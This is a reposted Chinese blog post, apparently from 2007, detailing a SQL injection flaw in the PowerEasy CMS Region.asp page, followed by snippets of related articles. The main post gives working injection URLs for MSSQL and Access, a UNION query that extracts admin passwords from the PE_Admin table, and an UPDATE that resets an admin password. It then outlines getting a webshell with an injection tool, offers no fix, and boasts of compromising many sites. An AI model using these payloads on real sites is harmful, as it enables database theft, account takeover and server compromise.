动易Region.asp漏洞

最新推荐文章于 2023-04-18 17:28:27 发布
最新推荐文章于 2023-04-18 17:28:27 发布
阅读量195 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/allyesno/archive/2007/06/25/794310.html
版权

详细说明:
今天下午看了一个下午的动网代码,头甚是疼,于是晚上回来,找找动易还有其他漏洞没,结果一看,还真有一处,逻辑错误!
在Region.asp中

Country = ReplaceBadChar(Trim(Request(\\\"Country\\\")))
Province = ReplaceBadChar(Trim(Request(\\\"Province\\\")))
City = ReplaceBadChar(Trim(Request(\\\"City\\\")))

对所有传入的变量都进行了过滤,但是编程者在这里:

Set TempRs = Conn.Execute(\\\"SELECT Province FROM PE_Province WHERE Country=\\\'\\\" & Country & \\\"\\\' ORDER BY ProvinceID\\\")
If Err Or TempRs.EOF Then
ReDim ShowProvince(0, 0)
Province = Trim(Request.QueryString(\\\"Province\\\"))
Else
ShowProvince = TempRs.GetRows(-1)
End If
Set TempRs = Conn.Execute(\\\"SELECT DISTINCT City FROM PE_City WHERE Province=\\\'\\\" & Province & \\\"\\\'\\\")

大家可以看到,Province = Trim(Request.QueryString(\\\"Province\\\")) 这里直接取的是

传入的Province,而不是过滤后的,所以这个Province变量危险了,那么在下面他是直接带入了查询,
由于Province变量是我们可以随意构造的,所以我们就可以构造我们的SQL语句。

参考:
http://whytt.mblogger.cn/
解决方案:
暂无

测试方法:

[警 告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

但是要进入这个查询的前提是:Err=true 或者 TempRs.EOF,而要达到这2个中的一个,就是要让Conn.Execute(\\\"SELECT Province FROM PE_Province WHERE Country=\\\'\\\" & Country & \\\"\\\' ORDER BY ProvinceID\\\")这条语句在表中查询不到所要找的Country,这样就好构造了。下面是利用代码:

http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi\\\'+and+user>0--

就是在

http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi\\\'后面加上我们的SQL注入语句。


这就是整个利用原理,很简单,但也很致命的漏洞。


上面是MSSQL版本的利用,而如果要是ACCESS版本中的利用,那么怎么办呢,

呵呵,聪明的你可能觉得我在说废话老,看吧。

http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi\\\' and 1=1 and \\\'1\\\'=\\\'1

这样的话,我们的and 1=1就是在access版本中的利用。呵呵。这样就完成这个漏洞在2个版本的利用。

http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi\\\'+and+1=2+union+select
+password+from+PE_Admin+where+1<2+and+\\\'1\\\'=\\\'1


其中username是要暴的字段,哈哈,通杀的感觉爽吧


By
WhyTt


补充:

update PE_Admin set Password=\\\'13955235245b2497\\\' where id=2--

如果不可以列目录就插管理员,但我喜欢直接update管理员密码,拿完shell后改回来,或去加一个

如果可以列目录就直接找web目录,然后用nb的getwebshell就可以拿到webshell了

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 




前段时间就知道动易不止一个洞,这又被人放出来,
通杀ACC,MSSQL
http://site.com/region.asp?country=tt&city=whytt&province=shi'

后面就是SQL语句啦

返回信息:
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 'shi'' 之前有未闭合的引号。
/region.asp,行 32

针对mssql的
NBSI 直接列目录 >备份> ok!

转载于:https://www.cnblogs.com/allyesno/archive/2007/06/25/794310.html

weixin_30273501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
动易网站管理系统vote.asp页面存在SQL注入漏洞
11-03 3831
  动易网站管理系统vote.asp页面存在SQL注入漏洞   测试系统:   动易(PowerEasy CMS SP6 071030以下版本)   安全综述:   动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。   漏洞描述:   vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不
SQL注入漏洞
weixin_44722125的博客
03-17 435
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注...
IIS解析缺陷,动易动网的又一新漏洞
her0z的专栏
03-27 1530
IIS解析缺陷,动易动网的又一新漏洞在服务器上新建一个文件夹,命名为: Vo.asp (注意是文件夹的名字)然后将你的ASP文件(假设:name.asp)改成 Name.jpg( 或其他后缀名)放到Vo.asp文件夹下访问:http://地址/Vo.asp/Name.jpg发现了什么? JPG文件被当成ASP执行了吧!针对动易的攻击方法:前提要求:该网站使用 动易系统,并且
动易0day--Region.asp注入
link641的专栏
08-30 1268
ps: 虽然是老文 但觉得触发的思路不错 所以转载之  今天下午看了一个下午的动网代码,头甚是疼,于是晚上回来,找找动易更有其他漏洞没,结果一看,还真有一处,逻辑错误!在Region.aspCountry = ReplaceBadChar(Trim(Request("Country")))Province = ReplaceBadChar(Trim(Request("
动易网站管理系统删除任意文件漏洞
jahn的专栏
09-23 2303
这个漏洞对于动易网站管理系统来说,就是致命的了。此漏洞存在于User目录下的User_saveflash.asp文件中,其第6~22行代码如下所示。Dim act, ObjInstalled_FSO, color_name, Create_1, imgurl, SaveFileName, dirMonthobjName_FSO = Application("objName_FSO")ObjInst
动易SmartSchool.Professional升级补丁
01-24
"动易SmartSchool.Professional升级补丁"是针对动易SmartSchool专业版的一个重要更新,主要用于提升系统性能,修复已知问题,并可能引入新的功能或优化现有功能。动易SmartSchool是一款专为教育行业设计的学校信息化...
动易 BizIdea.Standard_5.2
11-03
动易 BizIdea.Standard_5.2】是一款由动易网络公司开发的企业级网站管理系统。这个系统的主要目标是为企业提供高效、稳定的网站建设和管理解决方案。版本5.2代表了该产品的一个重要更新,可能包含了对前一版本的...
爱美娜家庭日记-动易内核.rar
07-05
本系统是一套基于WEB的网站管理系统,采用网络...请先修改Conn.asp数据库连接在运行 Install.asp 以进行系统安装过程! 如果你已经反复运行此程序,但仍然出现此提示,请使用FTP工具手动删除 NotInstalled.txt 文件。
动易SmartSchool.Professional3.6版
12-02
动易SmartSchool.Professional3.6版》是一款针对教育行业的专业级网站管理系统,集成了丰富的功能和服务,旨在为商业用户提供高效、稳定的网站建设和管理解决方案。该版本不仅提供了完整的安装包,还附带了源代码...
动易系统的论坛转贴工具 -ASP源码.zip
12-13
标题中的“动易系统的论坛转贴工具 -ASP源码.zip”揭示了这是一个基于ASP(Active Server Pages)编程语言开发的论坛转贴工具的源代码。ASP是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。这个工具...
PowerEasy SiteWeaver CMS6.5开源动易
03-22
第一步、备份好当前正在运行动易2006版的网站的Conn.asp和Config.asp。 第二步、将“源代码”中的所有文件复制到当前网站中,覆盖原来的文件。 第三步、根据原来Conn.asp和Config.asp中的设置,修改新Conn.asp和Config.asp中的设置。 第四步、按照“升级及转换程序\动易2006ToSiteWeaver6.5数据库升级程序”中的说明将2006版的数据库升级好。 第五步、登录后台,进入“系统设置--频道管理”,更新所有频道文件。 第六步、进入“系统设置--网站风格管理”,刷新风格CSS文件。 第七步、进入各频道的栏目管理,刷新栏目JS。 第八步、如果启用了商城,还需要进入“系统设置--在线支付平台管理”,设置在线支付平台的相应参数。 PowerEasySiteWeaver6.5相对于动易2006的功能更新说明: 代码结构完全重新设计和优化,由原来的调用组件方式改成适用常规ASP程序的文件包含及过程调用方式。 优化了一些代码和算法,使得性能提升了30%,生成速度提升了50%,资源占用减少了50%。在特别情况下更是提升了几倍不止(如“生成所有未生成的文章”功能)。 经过BCT的审计,修复了不少动易2006版中存在的漏洞。为了安全,大家一定要升级到这个版本! 改进了生成HTML的方式,将原来的“快速生成”和“慢速生成”相结合为新的生成方式。新的生成方式采用每页生成指定数量的HTML页方式,这种方式即具有原来“快速生成”的速度优点,又避免了原来“快速生成”方式在单个页面内生成所有HTML页会极大占用CPU和内存的缺点。 改进了生成JS方式,将原来的发表文章时自动更新JS文件但不显示任何信息的方式改为与自动生成HTML类似的方式。 新增支付平台管理功能,前台增加提供多个在线支付平台供用户选择的功能
动易开源PowerEasy@SiteWeaver CMS6.5
03-22
PowerEasy?SiteWeaver?6.5版是完全开源的!并且PowerEasy?SiteWeaver?CMS6.5版和PowerEasy?SiteWeaver?eShop6.5版二个子产品将完全免费提供给个人非商业使用!用户可免费下载、免费使用、免费升级,无使用时间与功能限制。 PowerEasy?SiteWeaver?6.5版同时提供了ACCESS数据库和MSSQL数据库。无论您是商业用户还是免费用户,都可以根据自己的需要选择简单易用的ACCESS数据库还是高性能的MSSQL数据库。 所有动易2006的用户都可以免费升级到PowerEasy?SiteWeaver?6.5版。压缩包中已经提供了相应的升级程序和升级说明。升级过程将是非常简单的。 把“源代码”文件夹的所有文件上传到你的服务器上,然后运行 http://你的网址/Install.asp 进行安装。 如果您在安装或使用过程中遇到任何问题,请到动易帮助中心(http://help.powereasy.net)查看解决方法。动易帮助中心为您提供了最全面的关于动易产品的知识文档。 从2006版升级的操作步骤: 第一步、备份好当前正在运行动易2006版的网站的Conn.asp和Config.asp。 第二步、将“源代码”中的所有文件复制到当前网站中,覆盖原来的文件。 第三步、根据原来Conn.asp和Config.asp中的设置,修改新Conn.asp和Config.asp中的设置。 第四步、按照“升级及转换程序\动易2006ToSiteWeaver6.5数据库升级程序”中的说明将2006版的数据库升级好。 第五步、登录后台,进入“系统设置--频道管理”,更新所有频道文件。 第六步、进入“系统设置--网站风格管理”,刷新风格CSS文件。 第七步、进入各频道的栏目管理,刷新栏目JS。 第八步、如果启用了商城,还需要进入“系统设置--在线支付平台管理”,设置在线支付平台的相应参数。 PowerEasySiteWeaver6.5相对于动易2006的功能更新说明: ●代码结构完全重新设计和优化,由原来的调用组件方式改成适用常规ASP程序的文件包含及过程调用方式。 ●优化了一些代码和算法,使得性能提升了30%,生成速度提升了50%,资源占用减少了50%。在特别情况下更是提升了几倍不止(如“生成所有未生成的文章”功能)。 ●经过BCT的审计,修复了不少动易2006版中存在的漏洞。为了安全,大家一定要升级到这个版本! ●改进了生成HTML的方式,将原来的“快速生成”和“慢速生成”相结合为新的生成方式。新的生成方式采用每页生成指定数量的HTML页方式,这种方式即具有原来“快速生成”的速度优点,又避免了原来“快速生成”方式在单个页面内生成所有HTML页会极大占用CPU和内存的缺点。 ●改进了生成JS方式,将原来的发表文章时自动更新JS文件但不显示任何信息的方式改为与自动生成HTML类似的方式。 ●新增支付平台管理功能,前台增加提供多个在线支付平台供用户选择的功能
PowerEasy SiteWeaver eShop6.5动易商城
03-25
PowerEasySiteWeaver6.5相对于动易2006的功能更新说明: 代码结构完全重新设计和优化,由原来的调用组件方式改成适用常规ASP程序的文件包含及过程调用方式。 优化了一些代码和算法,使得性能提升了30%,生成速度提升了50%,资源占用减少了50%。在特别情况下更是提升了几倍不止(如“生成所有未生成的文章”功能)。 经过BCT的审计,修复了不少动易2006版中存在的漏洞。为了安全,大家一定要升级到这个版本! 改进了生成HTML的方式,将原来的“快速生成”和“慢速生成”相结合为新的生成方式。新的生成方式采用每页生成指定数量的HTML页方式,这种方式即具有原来“快速生成”的速度优点,又避免了原来“快速生成”方式在单个页面内生成所有HTML页会极大占用CPU和内存的缺点。 改进了生成JS方式,将原来的发表文章时自动更新JS文件但不显示任何信息的方式改为与自动生成HTML类似的方式。 新增支付平台管理功能,前台增加提供多个在线支付平台供用户选择的功能
第十八天:WEB攻防-ASP安全&MDB下载植入&IIS短文件名&写权限&解析
m0_51322401的博客
01-06 708
找到之后为输入他的路径http://192.168.106.132/database/powereasy2006.mdb便可下载他的数据库文件。然后我们可以进入http://192.168.106.132/admin/Admin_Login.asp,也就是后台管理,便可操作他的数据库。当数据库文件是 mdb格式文件时,可以直接访问数据库文件,然后本地就会下载该数据库,使用数据库工具打开即可获得所有数据库信息。在后台文件中有一个这个数据,即为他的数据库文件。-asp程序的数据库下载植入。
动易安全开发手册 完整版
TOMMY201112的博客
08-20 655
动易安全开发手册 目录 一、输入验证3 1.什么是输入3 2.输入验证的必要性3 3.输入验证技术3 3.1 主要防御方式3 3.2 辅助防御方式5 二、输出编码8 1.输出的种类8 2.输出编码的必要性8 3....
动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞
weixin_39553904的博客
05-30 999
动易网站管理系统vote.asp页面存在SQL注入漏洞测试系统:动易(PowerEasy CMS SP6 071030以下版本)安全综述:动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。漏洞描述:vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入但是其语句里面过滤...
SQL防注入功能原理相关知识
ASP和PHP工作经验
03-12 1430
SQL防注入功能原理相关知识 作者:夜狼    文章来源:动易论坛    点击数:36    更新时间:2008-3-12         SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐
动易html在线编辑器 漏洞,动易网站漏洞总结
weixin_33895652的博客
05-30 521
动易漏洞总结方法1:注册用户 keio.asAhttp://xtfhzx.com/reg/user_reg.asp上传jpg马http://www.URL.com/user/Upload.asp?dialogtype=UserBlogPic&size=5方法2:先暴所有管理员帐号。/Region.asp?Country=tt&City=whytt&Province=shi'...
渗透测试-信息打点
Bnessy
04-18 1631
渗透测试-信息打点
动易 asp 首页js焦点图
最新发布
09-19
动易 ASP 首页的焦点图可以通过以下步骤实现: 首先,在 ASP 的首页页面中,需要添加一个用于显示焦点图的容器,可以是一个 div 标签。可以设置该容器的样式,如宽度、高度、背景颜色等。 然后,在服务器端,通过 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值